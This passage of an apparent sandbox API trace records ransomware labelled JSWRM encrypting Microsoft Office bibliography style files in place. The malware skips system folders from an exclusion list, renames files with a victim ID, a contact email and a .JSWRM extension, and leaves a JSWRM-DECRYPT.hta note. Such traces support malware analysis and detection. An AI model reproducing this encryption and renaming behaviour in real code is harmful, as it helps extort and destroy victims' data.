| out: lpMultiByteStr="ISO690.XSL", lpUsedDefaultChar=0x0) returned 10 [0128.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0128.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0128.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ISO690.XSL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0128.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ISO690.XSL", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ISO690.XSL", lpUsedDefaultChar=0x0) returned 10 [0128.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0128.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0128.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0128.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0128.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\iso690.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.746] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=270642) returned 1 [0128.746] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.746] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.759] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.759] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.759] CloseHandle (hObject=0x314) returned 1 [0128.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0128.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0128.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0128.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0128.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0128.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0128.759] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0128.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0128.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0128.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0128.760] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\iso690.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\ISO690.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\iso690.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0128.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0128.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0128.765] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2ad8211, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc2d86b0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0xf11a8, dwReserved1=0x0, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0128.765] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2=".") returned 1 [0128.765] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="..") returned 1 [0128.765] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="...") returned 1 [0128.765] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="windows") returned -1 [0128.765] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="recovery") returned -1 [0128.765] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="perflogs") returned -1 [0128.765] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="documents and settings") returned 1 [0128.765] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="$RECYCLE.BIN") returned 1 [0128.765] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="system volume information") returned -1 [0128.766] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="msocache") returned -1 [0128.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0128.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ISO690Nmerical.XSL", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0128.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0128.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ISO690Nmerical.XSL", cchWideChar=18, lpMultiByteStr=0x240ef8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ISO690Nmerical.XSL", lpUsedDefaultChar=0x0) returned 18 [0128.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0128.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0128.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ISO690Nmerical.XSL", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0128.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0128.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ISO690Nmerical.XSL", cchWideChar=18, lpMultiByteStr=0x241100, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ISO690Nmerical.XSL", lpUsedDefaultChar=0x0) returned 18 [0128.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0128.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0128.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0128.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0128.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\iso690nmerical.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.767] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=217578) returned 1 [0128.767] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.767] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.889] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.890] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.890] CloseHandle (hObject=0x314) returned 1 [0128.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0128.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0128.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0128.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0128.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0128.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0128.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0128.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0128.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0128.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0128.891] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\iso690nmerical.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\ISO690Nmerical.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\iso690nmerical.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.892] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0128.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0128.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0128.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0128.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0128.893] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x434b4343, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x434b4343, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x434b4343, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf11a8, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0128.893] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0128.893] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0128.893] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0128.893] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0128.893] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0128.893] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0128.893] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0128.893] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0128.893] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0128.893] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0128.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0128.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0128.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0128.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0128.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0128.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0128.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0128.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0128.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0128.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0128.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0128.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0128.893] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc2ad8211, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc2d86b0f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0xf11a8, dwReserved1=0x0, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0128.893] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2=".") returned 1 [0128.893] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="..") returned 1 [0128.893] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="...") returned 1 [0128.894] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="windows") returned -1 [0128.894] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="recovery") returned -1 [0128.894] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="perflogs") returned -1 [0128.894] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="documents and settings") returned 1 [0128.894] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="$RECYCLE.BIN") returned 1 [0128.894] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="system volume information") returned -1 [0128.894] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="msocache") returned -1 [0128.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0128.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MLASeventhEditionOfficeOnline.xsl", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0128.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0128.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MLASeventhEditionOfficeOnline.xsl", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MLASeventhEditionOfficeOnline.xsl", lpUsedDefaultChar=0x0) returned 33 [0128.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0128.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0128.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MLASeventhEditionOfficeOnline.xsl", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0128.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0128.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MLASeventhEditionOfficeOnline.xsl", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MLASeventhEditionOfficeOnline.xsl", lpUsedDefaultChar=0x0) returned 33 [0128.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0128.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0128.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0128.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0128.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0128.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0128.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0128.895] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=255219) returned 1 [0128.895] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0128.895] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0128.911] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.911] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0128.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0128.911] CloseHandle (hObject=0x314) returned 1 [0128.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0128.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0128.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0128.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0128.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0128.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0128.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0128.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0128.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0128.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0128.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0128.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0128.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0128.912] 